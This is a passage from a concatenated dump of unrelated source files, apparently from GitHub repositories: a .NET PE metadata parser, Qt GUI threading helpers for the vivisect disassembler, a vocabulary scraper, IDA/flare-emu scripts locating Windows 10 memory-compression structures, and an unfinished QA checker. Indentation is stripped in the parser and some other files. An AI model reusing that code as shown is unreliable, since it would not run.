DNT_CustomAttribute: 'DNT_CustomAttribute',
DNT_FieldMarshal: 'DNT_FieldMarshal',
DNT_DeclSecurity: 'DNT_DeclSecurity',
DNT_ClassLayout: 'DNT_ClassLayout',
DNT_FieldLayout: 'DNT_FieldLayout',
DNT_StandAloneSig: 'DNT_StandAloneSig',
DNT_EventMap: 'DNT_EventMap',
DNT_Event: 'DNT_Event',
DNT_PropertyMap: 'DNT_PropertyMap',
DNT_Property: 'DNT_Property',
DNT_MethodSemantics: 'DNT_MethodSemantics',
DNT_MethodImpl: 'DNT_MethodImpl',
DNT_ModuleRef: 'DNT_ModuleRef',
DNT_TypeSpec: 'DNT_TypeSpec',
DNT_ImplMap: 'DNT_ImplMap',
DNT_FieldRVA: 'DNT_FieldRVA',
DNT_Assembly: 'DNT_Assembly',
DNT_AssemblyProcessor: 'DNT_AssemblyProcessor',
DNT_AssemblyOS: 'DNT_AssemblyOS',
DNT_AssemblyRef: 'DNT_AssemblyRef',
DNT_AssemblyRefProcessor: 'DNT_AssemblyRefProcessor',
DNT_AssemblyRefOS: 'DNT_AssemblyRefOS',
DNT_File: 'DNT_File',
DNT_ExportedType: 'DNT_ExportedType',
DNT_ManifestResource: 'DNT_ManifestResource',
DNT_NestedClass: 'DNT_NestedClass',
DNT_GenericParam: 'DNT_GenericParam',
DNT_MethodSpec: 'DNT_MethodSpec',
DNT_GenericParamConstraint: 'DNT_GenericParamConstraint',
}
class DNetDirectory(VStruct):
def __init__(self):
super(DNetDirectory, self).__init__()
self.cb = vp.v_uint32()
self.nMajor = vp.v_uint16()
self.nMinor = vp.v_uint16()
self.nMetaDataRVA = vp.v_uint32()
self.nMetaDataSize = vp.v_uint32()
class DNetMetaDataHeader(VStruct):
def __init__(self):
super(DNetMetaDataHeader, self).__init__()
self.Signature = vp.v_uint32()
self.nMajor = vp.v_uint16()
self.nMinor = vp.v_uint16()
self.reserved = vp.v_uint32()
self.nVersionLength = vp.v_uint32()
def vsParse(self, bytez, offset, fast=True):
super(DNetMetaDataHeader, self).vsParse(bytez, offset, fast)
here = 0x10 + offset
version_end_offset = here + self.nVersionLength
sVersion = bytez[here:version_end_offset]
self.sVersion = vp.v_str(len(sVersion))
self.sVersion = sVersion
sFlags = bytez[version_end_offset:version_end_offset + 2]
self.nFlags = vp.v_uint16(struct.unpack("<H", sFlags)[0])
sNumberOfStreams = bytez[version_end_offset + 2:version_end_offset + 4]
self.nNumberOfSteams = vp.v_uint16(
struct.unpack("<H", sNumberOfStreams)[0])
class DNetStreamInfo(VStruct):
def __init__(self):
super(DNetStreamInfo, self).__init__()
self.nOffset = vp.v_uint32()
self.nSize = vp.v_uint32()
def vsParse(self, bytez, offset, fast=True):
super(DNetStreamInfo, self).vsParse(bytez, offset, fast)
here = offset + len(self)
_s = []
offset = here
while bytez[offset] != '\x00':
_s.append(bytez[offset])
offset += 1
_slen = len(_s)
nblocks = (_slen // DWORD_SIZE) + 1
slen = nblocks * DWORD_SIZE
self.sName = vp.v_str(slen)
sName = bytez[here:here + slen]
self.sName = sName
class DNetTablesHeader(VStruct):
def __init__(self):
super(DNetTablesHeader, self).__init__()
self.nReserve = vp.v_uint32()
self.nUnknown = vp.v_uint32()
self.nMaskValidLow = vp.v_uint32()
self.nMaskValidHigh = vp.v_uint32()
self.nMaskSortedLow = vp.v_uint32()
self.nMaskSortedHigh = vp.v_uint32()
def vsParse(self, *args, **kwargs):
super(DNetTablesHeader, self).vsParse(*args, **kwargs)
self.nMaskValid = (self.nMaskValidHigh << 32) + self.nMaskValidLow
self.nMaskSorted = (self.nMaskSortedHigh << 32) + self.nMaskSortedLow
class DNetTableRow_Module(VStruct):
def __init__(self):
super(DNetTableRow_Module, self).__init__()
self.Generation = vp.v_uint16()
self.Name = vp.v_uint16()
self.Mvid = vp.v_uint16()
self.EncId = vp.v_uint16()
self.EncBaseId = vp.v_uint16()
class DNetTableRow_TypeRef(VStruct):
def __init__(self):
super(DNetTableRow_TypeRef, self).__init__()
self.ResolutionScope = vp.v_uint16()
self.Name = vp.v_uint16()
self.Namespace = vp.v_uint16()
class DNetTableRow_TypeDef(VStruct):
def __init__(self):
super(DNetTableRow_TypeDef, self).__init__()
self.Flags = vp.v_uint32()
self.Name = vp.v_uint16()
self.Namspace = vp.v_uint16()
self.Extends = vp.v_uint16()
self.FieldList = vp.v_uint16()
self.MethodList = vp.v_uint16()
class DNetTableRow_Field(VStruct):
def __init__(self):
super(DNetTableRow_Field, self).__init__()
self.Flags = vp.v_uint16()
self.Name = vp.v_uint16()
self.Signature = vp.v_uint16()
class DNetTableRow_MethodDef(VStruct):
def __init__(self):
super(DNetTableRow_MethodDef, self).__init__()
self.RVA = vp.v_uint32()
self.ImplFlags = vp.v_uint16()
self.Flags = vp.v_uint16()
self.Name = vp.v_uint16()
self.Signature = vp.v_uint16()
self.ParamList = vp.v_uint16()
def vsParse(self, bytez, offset, fast=True):
super(DNetTableRow_MethodDef, self).vsParse(bytez, offset, fast)
self.nOffset = offset
self.nToken = 0
def GetMaskNumberByBits(nBits):
if nBits < 0:
return None
return 1 << nBits
def MIDToToken(nMid):
return 0x6000000 + nMid
def TokenToMid(nToken):
return nToken & 0xFFFFFF
class PyDNet(object):
def __init__(self, filename, debug=False):
self.filename = filename
self.pe = pefile.PE(self.filename)
with open(self.filename, 'rb') as _ifile:
self.filedata = [ord(_) for _ in _ifile.read()]
self.filesize = len(self.filedata)
# ---------------------------------------------------------------------
self.Methods = None
self.DNetDirectory = None
self.nDNetDirectoryOffset = None
# ---------------------------------------------------------------------
self.logger = logging.getLogger(self.__class__.__name__)
self.logger.debug("Initialized!")
def Parse(self):
'''
        Parse the file specified by the filename passed to __init__().
'''
with open(self.filename, 'rb') as _ifile:
pedata = _ifile.read()
de = self._GetDNetEntry()
if de is None:
raise RuntimeError(".NET directory not found")
nDirectoryBaseOffset = de.VirtualAddress
self.nDNetDirectoryOffset = self.FileOffsetFromRVA(de.VirtualAddress)
self.logger.debug(
".NET directory file offset: %s",
hex(self.nDNetDirectoryOffset))
self.DNetDirectory = DNetDirectory()
self.DNetDirectory.vsParse(pedata, offset=self.nDNetDirectoryOffset)
self.logger.debug(
".NET directory info: cb: 0x%s, rva: 0x%s",
hex(self.DNetDirectory.cb), hex(self.DNetDirectory.nMetaDataRVA))
self.nDNetMetaDataHeaderOffset = self.FileOffsetFromRVA(
self.DNetDirectory.nMetaDataRVA)
self.DNetMetaDataHeader = DNetMetaDataHeader()
self.DNetMetaDataHeader.vsParse(
pedata, offset=self.nDNetMetaDataHeaderOffset)
self.logger.debug(
".NET metadata signature: 0x%s, version: %s",
self.DNetMetaDataHeader.Signature,
self.DNetMetaDataHeader.sVersion)
self.nStreamsOffset = self.nDNetMetaDataHeaderOffset + len(self.DNetMetaDataHeader)
self.StreamMain = None
nStreamInfoOffset = self.nStreamsOffset
for i in range(self.DNetMetaDataHeader.nNumberOfSteams):
dnsi = DNetStreamInfo()
dnsi.vsParse(pedata, nStreamInfoOffset)
self.logger.debug(
".NET stream: %s, offset: %s, size: %s",
dnsi.sName, hex(dnsi.nOffset), hex(dnsi.nSize))
if self.StreamMain is None:
self.StreamMain = dnsi
nStreamInfoOffset += len(dnsi)
nTargetStreamOffset = nStreamInfoOffset
thdr = DNetTablesHeader()
thdr.vsParse(pedata, nTargetStreamOffset)
self.logger.debug(
".NET main stream header: %s at %s",
hex(thdr.nMaskValid), hex(nTargetStreamOffset))
nStartOfNumberOfRows = nTargetStreamOffset + len(thdr)
rc = self._LoadTablesInfo(
pedata, nStartOfNumberOfRows, thdr.nMaskValid)
return rc
def Close(self):
'''
Close the PE file handle to free up the file for edit/delete
'''
self.pe.close()
def GetSectionByRVA(self, rva):
'''
        Given an RVA, find the section that the RVA belongs to.
@return section on success, None if not found.
'''
for section in self.pe.sections:
sstart = section.VirtualAddress
send = sstart + section.Misc_VirtualSize
if sstart <= rva and rva <= send:
return section
return None
def GetSectionOffsetFromRVA(self, rva):
section = self.GetSectionByRVA(rva)
if section is None:
return None
return rva - section.VirtualAddress
def FileOffsetFromRVA(self, rva):
section = self.GetSectionByRVA(rva)
if section is None:
return None
offset = self.GetSectionOffsetFromRVA(rva)
return section.PointerToRawData + offset
def MIDToToken(self, nMid):
return MIDToToken(nMid)
def TokenToMID(self, nToken):
return TokenToMID(nToken)
def ReadDWORD(self, offset):
_s = [chr(_) for _ in self.ReadBytes(offset, 4)]
return struct.unpack("<I", ''.join(_s))[0]
def ReadBytes(self, offset, size):
if offset < 0 or offset + size > self.filesize:
return None
_bytez = self.filedata[offset:offset + size]
return _bytez
def SetByte(self, offset, bytez):
        if offset < 0 or offset + len(bytez) > self.filesize:
return False
for i in range(len(bytez)):
self.filedata[offset + i] = bytez[i]
return True
# -------------------------------------------------------------------------
    def _GetDNetEntry(self):
        # Default to None so Parse() can report a missing .NET directory
        de = None
        for _de in self.pe.OPTIONAL_HEADER.DATA_DIRECTORY:
if _de.name == 'IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR':
de = _de
break
return de
def _LoadTablesInfo(self, data, nStartOfNumberOfRows, nMask):
'''
        Load .NET tables content. This function does the minimum amount of work,
only to get to the MethodDef table and parse out the methods info.
'''
nNumberOfRows = 0
self.Tables = list()
# First, check all known TokenType against the valid mask from
# .NET metadata header to determine how many tables are available
for i in range(len(DNT_Types)):
nTokenType = DNT_Types[i]
nMaskNumber = GetMaskNumberByBits(nTokenType)
bExist = (nMaskNumber & nMask) != 0
if bExist:
tbl = {
'nTokenType': nTokenType,
'name': DNT_Names.get(nTokenType)
}
self.Tables.append(tbl)
# Read the number of rows for each table. The number of entries is
        # determined by the ValidMask field of the .NET metadata header
for i in range(len(self.Tables)):
v = self.Tables[i]
o = nStartOfNumberOfRows + i * DWORD_SIZE
nRows = self.ReadDWORD(o)
self.Tables[i].update({
'nRows': nRows, 'nIndex': i
})
nStartOfTablesData = nStartOfNumberOfRows + DWORD_SIZE * (len(self.Tables))
self.logger.debug("Start of tables data: %s", hex(nStartOfTablesData))
nCurrentOffset = 0
# For each table, parse the table content, but only to advance the file
# offset. The only table we really care about is the MethodDef table
for i in range(len(self.Tables)):
tbl = self.Tables[i]
rows = list()
self.logger.debug(
"Table %s strats at %s",
tbl.get('name'), hex(nStartOfTablesData + nCurrentOffset))
for j in range(1, tbl.get('nRows') + 1):
# NOTE: Row index starts at 1
nTokenType = tbl.get('nTokenType')
if nTokenType == DNT_Module:
ctor = DNetTableRow_Module
elif nTokenType == DNT_TypeRef:
ctor = DNetTableRow_TypeRef
elif nTokenType == DNT_TypeDef:
ctor = DNetTableRow_TypeDef
elif nTokenType == DNT_Field:
ctor = DNetTableRow_Field
elif nTokenType == DNT_MethodDef:
ctor = DNetTableRow_MethodDef
else:
# ignore the other tables after MethodDef
continue
row = ctor()
row.vsParse(data, nStartOfTablesData + nCurrentOffset)
if nTokenType == DNT_MethodDef:
# Save the token and the MID for convenience
row.nToken = MIDToToken(j)
row.nMID = j
self.logger.debug("Adding a %s row", tbl.get('name'))
nCurrentOffset += len(row)
rows.append(row)
tbl.update({'rows': rows})
# The Tables variable goes out of scope here. So, we are saving
# the methods for use later.
for i in range(len(self.Tables)):
if self.Tables[i].get('nTokenType') == DNT_MethodDef:
self.Methods = self.Tables[i].get('rows')
return True
return False
``` |
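A rough usage sketch of the class above; the file path is a placeholder, and treating the truthy return value of Parse() as success is an assumption based on _LoadTablesInfo():

```python
# Sketch only; "sample_dotnet.exe" is a placeholder path.
dn = PyDNet("sample_dotnet.exe")
if dn.Parse():
    for m in dn.Methods:
        print('token=%s rva=%s' % (hex(m.nToken), hex(m.RVA)))
dn.Close()
```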
{
"source": "4k4xs4pH1r3/M4nifest0_IG_ReportV4",
"score": 2
} |
#### File: 4k4xs4pH1r3/M4nifest0_IG_ReportV4/get_platform_name.py
```python
import platform
import struct
import sys
from ctypes import cdll, c_char_p, CFUNCTYPE
from fnmatch import fnmatch
plat_table = (
('windows', ('windows', 'cygwin-*')),
('darwin', ('darwin',)),
('ios', ('ios',)),
('linux', ('linux*',)),
('freebsd', ('freebsd*', 'openbsd*', 'isilon onefs')),
('poky', ('poky',)),
)
arch_table = (
('x86', ('i?86', )),
('x86_64', ('x64', 'x86_64', 'amd64', 'intel')),
('arm', ('armv5',)),
('armv6', ('armv6l',)),
('armv7', ('armv7l',)),
('ppc64', ('ppc64le',)),
('mips32', ('mips',)),
('aarch32', ('aarch32',)),
('aarch64', ('aarch64', 'arm64'))
)
def _match_features(patterns, s):
for pat in patterns:
if fnmatch(s, pat):
return True
def _gnu_get_libc_version():
try:
prototype = CFUNCTYPE(c_char_p)
ver = prototype(('gnu_get_libc_version', cdll.LoadLibrary('')))()
return ver.decode().split('.')
except Exception:
pass
def format_platform():
plat = platform.system().lower()
mach = platform.machine().lower()
for alias, platlist in plat_table:
if _match_features(platlist, plat):
plat = alias
break
if plat == 'linux':
cname, cver = platform.libc_ver()
if cname == 'musl':
plat = 'musl'
elif cname == 'libc':
plat = 'android'
elif cname == 'glibc':
v = _gnu_get_libc_version()
if v and len(v) >= 2 and (int(v[0]) * 100 + int(v[1])) < 214:
plat = 'centos6'
for alias, archlist in arch_table:
if _match_features(archlist, mach):
mach = alias
break
if plat == 'windows' and mach == 'x86_64':
bitness = struct.calcsize('P'.encode()) * 8
if bitness == 32:
mach = 'x86'
return '.'.join([plat, mach])
if __name__ == '__main__':
print('platform.system is "%s"' % platform.system())
print('platform.machine is "%s"' % platform.machine())
print('sys.byteorder is "%s"' % sys.byteorder)
print('The standard platform name is "%s"' % format_platform())
``` |
{
"source": "4k4xs4pH1r3/vivisect",
"score": 2
} |
#### File: vivisect/qt/funcviews.py
```python
from PyQt4 import QtCore,QtGui
import envi.qt.memcanvas as e_q_memcanvas
import vivisect.qt.ctxmenu as viv_q_ctxmenu
import visgraph.renderers.qgraphtree as vg_qgraphtree
from vqt.basics import *
class FuncBlockModel(BasicModel):
columns = ( 'Base Address', 'Size' )
class FunctionBlocksView(BasicTreeView):
_sig_BlockSelected = QtCore.pyqtSignal( object )
def __init__(self, vw, parent=None):
self.vw = vw
BasicTreeView.__init__(self, parent=parent)
self.setModel( FuncBlockModel() )
self.setWindowTitle('Code Blocks: ')
def selectionChanged(self, selected, unselected):
indexes = selected.indexes()
if indexes:
index = indexes[0]
row = self.model().rows[ index.row() ]
block = row[-1]
self._sig_BlockSelected.emit( block )
cmap = {}
bva, bsize, fva = block
for i in xrange(bsize):
cmap[ bva + i ] = 'yellow'
# Since we have a reference to the GUI, lets also
# send a coloration signal.
vwgui = self.vw.getVivGui()
vwgui.vivMemColorSignal.emit( cmap )
return BasicTreeView.selectionChanged( self, selected, unselected )
def closeEvent(self, event):
# On close, remove any color mappings...
vwgui = self.vw.getVivGui()
vwgui.vivMemColorSignal.emit( {} )
return BasicTreeView.closeEvent( self, event )
def functionSelected(self, fva):
self.setWindowTitle( 'Code Blocks: %s' % self.vw.getName( fva ) )
blocks = self.vw.getFunctionBlocks( fva )
rows = [ ('0x%.8x' % block[0], block[1], block) for block in blocks ]
model = FuncBlockModel( rows=rows )
self.setModel( model )
self.sortByColumn( 0, QtCore.Qt.AscendingOrder )
class FuncCallsView(QtGui.QWidget):
def __init__(self, vw, parent=None):
self.vw = vw
QtGui.QWidget.__init__(self, parent=parent)
self.graphview = vg_qgraphtree.QGraphTreeView( None, (), parent=self)
self.graphview._sig_NodeContextMenu.connect( self.nodeContextMenu )
self.setLayout( VBox( self.graphview ) )
def functionSelected(self, fva):
self.setWindowTitle('Call Graph: %s' % self.vw.getName( fva ))
nprops = self.vw._call_graph.getNodeProps( fva )
self.graphview.loadNewGraph( self.vw._call_graph, ( (fva,nprops), ) )
def nodeContextMenu(self, pos, nid, nprops):
menu = QtGui.QMenu(parent=self)
viv_q_ctxmenu.buildContextMenu(self.vw, va=nid, menu=menu)
menu.exec_(pos)
```
#### File: vivisect/vqt/main.py
```python
import sys
import functools
import traceback
from Queue import Queue
from threading import currentThread
from PyQt4 import QtCore, QtGui
import envi.threads as e_threads
def idlethread(func):
'''
A decorator which causes the function to be called by the qt
main thread rather than synchronously...
    NOTE: This makes the call async, handled by the Qt main
    loop code. You can NOT return anything.
'''
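    # Illustrative sketch (widget and function names are made up, not from the
    # original source):
    #
    #   @idlethread
    #   def set_status(label, text):
    #       label.setText(text)          # touches Qt, so must run on the main thread
    #
    #   set_status(some_label, 'done')   # safe from any thread; returns None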
def idleadd(*args, **kwargs):
if iAmQtSafeThread():
return func(*args, **kwargs)
guiq.append( (func, args, kwargs) )
functools.update_wrapper(idleadd,func)
return idleadd
def workthread(func):
'''
Proxy a call through the single vqt.main worker thread
(who exists to keep the GUI from blocking on stuff... )
'''
# If we're already the work thread, just do it.
def workadd(*args, **kwargs):
if getattr(currentThread(),'VQtWorkerThread',False):
return func(*args, **kwargs)
workerq.append( (func,args,kwargs) )
functools.update_wrapper(workadd,func)
return workadd
def boredthread(func):
'''
The same as "workthread" above, but drop the request on the
floor if the worker thread already has better things to do...
'''
# If we're already the work thread, just do it.
def workadd(*args, **kwargs):
if getattr(currentThread(),'VQtWorkerThread',False):
return func(*args, **kwargs)
if not len(workerq):
workerq.append( (func,args,kwargs) )
functools.update_wrapper(workadd,func)
return workadd
def idlethreadsync(func):
'''
Similar to idlethread except that it is synchronous and able
to return values.
'''
q = Queue()
def dowork(*args, **kwargs):
try:
q.put(func(*args, **kwargs))
except Exception, e:
q.put(e)
def idleadd(*args, **kwargs):
if iAmQtSafeThread():
return func(*args, **kwargs)
guiq.append( (dowork, args, kwargs) )
return q.get()
functools.update_wrapper(idleadd,func)
return idleadd
class QFireThread(QtCore.QThread):
def __init__(self, callable, args, kwargs):
QtCore.QThread.__init__(self)
self.args = args
self.kwargs = kwargs
self.callable = callable
def run(self):
self.callable(*self.args, **self.kwargs)
def fireqtthread(func):
def doqtthread(*args, **kwargs):
func._qt_thread = QFireThread(func, args, kwargs)
func._qt_thread.start()
return func._qt_thread
functools.update_wrapper(doqtthread,func)
return doqtthread
def iAmQtSafeThread():
return getattr(currentThread(),'QtSafeThread',False)
class QEventThread(QtCore.QThread):
'''
    A thread that exists to consume callback requests from the
given workq and fire them into Qt *safely*.
'''
idleadd = QtCore.pyqtSignal(object,object,object)
def __init__(self, workq):
QtCore.QThread.__init__(self)
self.workq = workq
def run(self):
while True:
try:
todo = self.workq.get()
if todo == None:
continue
func,args,kwargs = todo
if func == None:
return
self.idleadd.emit(func,args,kwargs)
except Exception, e:
print('vqt event thread: %s' % e)
class VQApplication(QtGui.QApplication):
guievents = QtCore.pyqtSignal(str,object)
def __init__(self, *args, **kwargs):
QtGui.QApplication.__init__(self, *args, **kwargs)
self.vqtchans = {}
def callFromQtLoop(self, callback, args, kwargs):
callback(*args,**kwargs)
class QEventChannel(QtCore.QObject):
guievents = QtCore.pyqtSignal(str,object)
@e_threads.firethread
def workerThread():
# We are *not* allowed to make Qt API calls
currentThread().VQtWorkerThread = True
while True:
try:
todo = workerq.get()
if todo != None:
func,args,kwargs = todo
if func == None:
return
func(*args,**kwargs)
except Exception, e:
print('vqt worker warning: %s' % e)
def startup(css=None):
# yea yea.... globals suck...
global qapp # the main QApplication
global guiq # queue of GUI calls to proxy
global ethread # QtThread that consumes guiq
global workerq # queue of "worker" calls to proxy
guiq = e_threads.EnviQueue()
workerq = e_threads.EnviQueue()
currentThread().QtSafeThread = True
qapp = VQApplication(sys.argv)
if css:
qapp.setStyleSheet( css )
ethread = QEventThread(guiq)
ethread.idleadd.connect( qapp.callFromQtLoop )
ethread.start()
workerThread()
def main():
global qapp
if not iAmQtSafeThread():
raise Exception('main() must be called by same thread as startup()!')
qapp.exec_()
def eatevents():
global qapp
qapp.processEvents()
def vqtevent(event,einfo):
'''
Fire an event into the application wide GUI events subsystem.
Each event should be an event name ( str ) and arbitrary event
info context.
'''
global qapp
qapp.guievents.emit(event,einfo)
chan = qapp.vqtchans.get(event)
if chan != None:
chan.guievents.emit(event,einfo)
def vqtconnect(callback, event=None):
'''
Connect to the application wide "gui events" which has
a callback syntax:
callback(event,einfo)
    Optionally specify an event name to only receive events
of the specified type.
'''
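    # Illustrative sketch (the event name and payload are made up):
    #
    #   def on_thing(event, einfo):
    #       print('%s %r' % (event, einfo))
    #
    #   vqtconnect(on_thing, event='thing:changed')
    #   vqtevent('thing:changed', {'count': 1})   # on_thing fires via the Qt loop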
global qapp
if event == None:
qapp.guievents.connect( callback )
return
chan = qapp.vqtchans.get(event)
if chan == None:
chan = QEventChannel()
qapp.vqtchans[event] = chan
chan.guievents.connect(callback)
def vqtdisconnect(callback, event=None):
'''
    Disconnect a callback from the application wide "gui events"
    (previously connected with vqtconnect), where the callback syntax is:
        callback(event,einfo)
    Optionally specify an event name to only disconnect from events
    of the specified type.
'''
global qapp
if event == None:
qapp.guievents.disconnect( callback )
return
chan = qapp.vqtchans.get(event)
if chan != None:
chan.guievents.disconnect(callback)
```
#### File: vivisect/vqt/qpython.py
```python
import types
import traceback
from threading import Thread
from PyQt4 import QtCore, QtGui
from vqt.main import idlethread
from vqt.basics import *
@idlethread
def scripterr(msg, info):
msgbox = QtGui.QMessageBox()
msgbox.setText('Script Error: %s' % msg)
msgbox.setInformativeText(info)
msgbox.exec_()
class ScriptThread(Thread):
def __init__(self, cobj, locals):
Thread.__init__(self)
self.setDaemon(True)
self.cobj = cobj
self.locals = locals
def run(self):
try:
exec(self.cobj, self.locals)
except Exception, e:
scripterr(str(e), traceback.format_exc())
class VQPythonView(QtGui.QWidget):
def __init__(self, locals=None, parent=None):
if locals == None:
locals = {}
self._locals = locals
QtGui.QWidget.__init__(self, parent=parent)
self._textWidget = QtGui.QTextEdit(parent=self)
self._botWidget = QtGui.QWidget(parent=self)
self._help_button = QtGui.QPushButton('?', parent=self._botWidget)
self._run_button = QtGui.QPushButton('Run', parent=self._botWidget)
self._run_button.clicked.connect(self._okClicked)
self._help_button.clicked.connect( self._helpClicked )
self._help_text = None
hbox = HBox( None, self._help_button, self._run_button )
self._botWidget.setLayout( hbox )
vbox = VBox( self._textWidget, self._botWidget )
self.setLayout( vbox )
self.setWindowTitle('Python Interactive')
def _okClicked(self):
pycode = str(self._textWidget.document().toPlainText())
cobj = compile(pycode, "vqpython_exec.py", "exec")
sthr = ScriptThread(cobj, self._locals)
sthr.start()
def _helpClicked(self):
withhelp = []
for lname,lval in self._locals.items():
if type(lval) in (types.ModuleType, ):
continue
doc = getattr(lval, '__doc__', '\nNo Documentation\n')
if doc == None:
doc = '\nNo Documentation\n'
withhelp.append( (lname, doc) )
withhelp.sort()
txt = 'Objects/Functions in the namespace:\n'
for name,doc in withhelp:
txt += ( '====== %s\n' % name )
txt += ( '%s\n' % doc )
self._help_text = QtGui.QTextEdit()
self._help_text.setReadOnly( True )
self._help_text.setWindowTitle('Python Interactive Help')
self._help_text.setText( txt )
self._help_text.show()
``` |
{
"source": "4k4xs4pH1r3/vocab_scraper",
"score": 3
} |
#### File: 4k4xs4pH1r3/vocab_scraper/vocab.py
```python
import os
import re
import codecs
import string
import fnmatch
import argparse
import operator
from collections import defaultdict
def parse(f, word_frequencies, encoding='cp1251'):
with codecs.open(f, 'r', encoding) as infile:
for line in infile.readlines():
# Omit ASCII characters (between space (0x20) and tilde (0x7e))
words = re.split('[ -~]+', line)
for word in words:
word = word.strip(' \t\r\n\0')
if len(word):
word_frequencies[word] += 1
def parse_args():
desc = 'Vocabulary scraper'
parser = argparse.ArgumentParser(description=desc)
parser.add_argument('outfile', help='Output file')
parser.add_argument('--startdir', default='.', help='Directory to recurse')
parser.add_argument('--ienc', default='cp1251', help='Input encoding')
parser.add_argument('--oenc', default='utf-8', help='Output encoding')
return parser.parse_args()
def main():
args = parse_args()
word_frequencies = defaultdict(int)
files = []
masks = ['*.c', '*.h', '*.cpp', '*.hpp', '*.txt', '*.cs']
for root, dirnames, filenames in os.walk(args.startdir):
for mask in masks:
for filename in fnmatch.filter(filenames, mask):
files.append(os.path.join(root, filename))
for file in files:
try:
parse(file, word_frequencies, args.ienc)
except UnicodeDecodeError:
pass
sorted_words = sorted(word_frequencies.items(), key=operator.itemgetter(1))
sorted_words.reverse()
with codecs.open(args.outfile, 'w', args.oenc) as outfile:
for s, n in sorted_words:
outfile.write(str(n) + ': ' + s + '\r\n')
if __name__ == '__main__':
main()
``` |
{
"source": "4k4xs4pH1r3/win10_auto",
"score": 2
} |
#### File: 4k4xs4pH1r3/win10_auto/Smkm.py
```python
import logging
import struct
from Tools import Tools
class Smkm(Tools):
"""
    The Smkm class corresponds to the Windows 10 SMKM structure. The SMKM
structure is the last global structure used before relying on store-specific
structures to locate the compressed page.
"""
def __init__(self, loglevel=logging.INFO):
self.tools = super(Smkm, self).__init__()
self.logger = logging.getLogger("SMKM")
self.logger.setLevel(loglevel)
self.fe = self.get_flare_emu()
return
def _dump(self):
"""
Architecture agnostic function used to dump all located fields.
"""
arch = 'x64' if self.Info.is_64bit() else 'x86'
self.logger.info("SmkmStoreMetadataArray: {0:#x}".format(self.Info.arch_fns[arch]['sk_storemetadataarray'](self)))
return
@Tools.Info.arch32
@Tools.Info.arch64
def sk_storemetadataarray(self):
"""
This is an array of 32 pointers, each of which points to an array of 32 SMKM_STORE_METADATA
structures. The SmKmStoreRefFromStoreIndex function traverses the pointer array. This
signature asks the function to locate Store 0. The value stored in *CX at the end of
function emulation corresponds to the offset of the StoreMetadataArray. Disassembly snippet
from Windows 10 1809 x64 shown below.
SmKmStoreRefFromStoreIndex SmKmStoreRefFromStoreIndex proc near
SmKmStoreRefFromStoreIndex
SmKmStoreRefFromStoreIndex mov eax, edx
SmKmStoreRefFromStoreIndex+2 shr rax, 5
SmKmStoreRefFromStoreIndex+6 mov r8d, edx
SmKmStoreRefFromStoreIndex+9 mov rdx, [rcx+rax*8]
SmKmStoreRefFromStoreIndex+D test rdx, rdx
SmKmStoreRefFromStoreIndex+10 jnz short loc_140018069
SmKmStoreRefFromStoreIndex+12 xor eax, eax
SmKmStoreRefFromStoreIndex+14 retn
SmKmStoreRefFromStoreIndex+15 loc_140018069:
SmKmStoreRefFromStoreIndex+15 and r8d, 1Fh
SmKmStoreRefFromStoreIndex+19 lea rax, [r8+r8*4]
SmKmStoreRefFromStoreIndex+1D lea rax, [rdx+rax*8]
SmKmStoreRefFromStoreIndex+21 retn
SmKmStoreRefFromStoreIndex+21 SmKmStoreRefFromStoreIndex endp
"""
(fn_addr, fn_name) = self.find_ida_name("SmKmStoreRefFromStoreIndex")
lp_addr_smkmstoremgr = self.fe.loadBytes(struct.pack("<I", 0x1000))
num_store = 0x0
reg_cx = 'rcx' if self.Info.is_64bit() else 'ecx'
reg_dx = 'rdx' if self.Info.is_64bit() else 'edx'
regState = {reg_cx:lp_addr_smkmstoremgr, reg_dx:num_store}
self.fe.emulateRange(fn_addr, registers=regState)
return self.fe.getRegVal(reg_cx) - lp_addr_smkmstoremgr
```
#### File: 4k4xs4pH1r3/win10_auto/StStore.py
```python
import logging
from Tools import Tools
class StStore(Tools):
"""
The StStore class corresponds to the Windows 10 ST_STORE structure. The
ST_STORE structure is nested within SMKM_STORE and represents a single store.
The nested structure ST_DATA_MGR is the only field of interest in page retrieval.
"""
def __init__(self, loglevel=logging.INFO):
self.tools = super(StStore, self).__init__()
self.logger = logging.getLogger("ST_STORE")
self.logger.setLevel(loglevel)
self.fe = self.get_flare_emu()
return
def _dump(self):
"""
Architecture agnostic function used to dump all located fields.
"""
arch = 'x64' if self.Info.is_64bit() else 'x86'
self.logger.info("StDataMgr: {0:#x}".format(self.Info.arch_fns[arch]['ss_stdatamgr'](self)))
return
@Tools.Info.arch32
@Tools.Info.arch64
def ss_stdatamgr(self):
"""
This nested structure contains information used to correlate an SM_PAGE_KEY with a chunk key,
from which a compressed page's location can be derived from within a region of
MemCompression.exe. See ST_DATA_MGR for additional information. This function relies on the
second argument for StDmStart remaining constant. Disassembly snippet from Windows 10 1809 x86
shown below.
StStart+27A lea edx, [esi+38h]
StStart+27D mov ecx, esi
StStart+27F call ?StDmStart@?$ST_STORE@USM_TRAITS@@@@SGJPAU1@PAU_ST_DATA_MGR@1@...
"""
(startAddr, endAddr) = self.locate_call_in_fn("?StStart", "StDmStart")
self.fe.iterate([endAddr], self.tHook)
reg_dx = 'rdx' if self.Info.is_64bit() else 'edx'
return self.fe.getRegVal(reg_dx)
```
#### File: 4k4xs4pH1r3/win10_auto/w10deflate_auto.py
```python
import logging
from Magic import Magic
from SmkmStoreMgr import SmkmStoreMgr
from Smkm import Smkm
from SmkmStoreMetadata import SmkmStoreMetadata
from SmkmStore import SmkmStore
from StStore import StStore
from StDataMgr import StDataMgr
import idc
def main(loglevel=logging.INFO):
Magic(loglevel=loglevel)._dump()
SmkmStoreMgr(loglevel=loglevel)._dump()
Smkm(loglevel=loglevel)._dump()
SmkmStoreMetadata(loglevel=loglevel)._dump()
SmkmStore(loglevel=loglevel)._dump()
StStore(loglevel=loglevel)._dump()
StDataMgr(loglevel=loglevel)._dump()
return
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
if idc.get_name_ea_simple("_KiSystemStartup@4") == -1:
logging.warning("Launch script from within an ntoskrnl IDB with PDB symbols loaded")
else:
main(loglevel=logging.INFO)
``` |
{
"source": "4ka0/QA-checker",
"score": 3
} |
#### File: 4ka0/QA-checker/output.py
```python
from colorama import Fore
def output_results(segments):
'''
Function for outputting QA check results.
'''
print(Fore.CYAN + '\nRESULTS:\n')
errors_found_overall = False
for segment in segments:
if segment.error_found:
# Results for untranslated segments
if segment.untranslated_seg:
print(Fore.RED + 'Untranslated segment found.')
errors_found_overall = True
# Results for consecutive spaces
if segment.consecutive_space_found:
print(Fore.RED + 'Consecutive spaces found.')
errors_found_overall = True
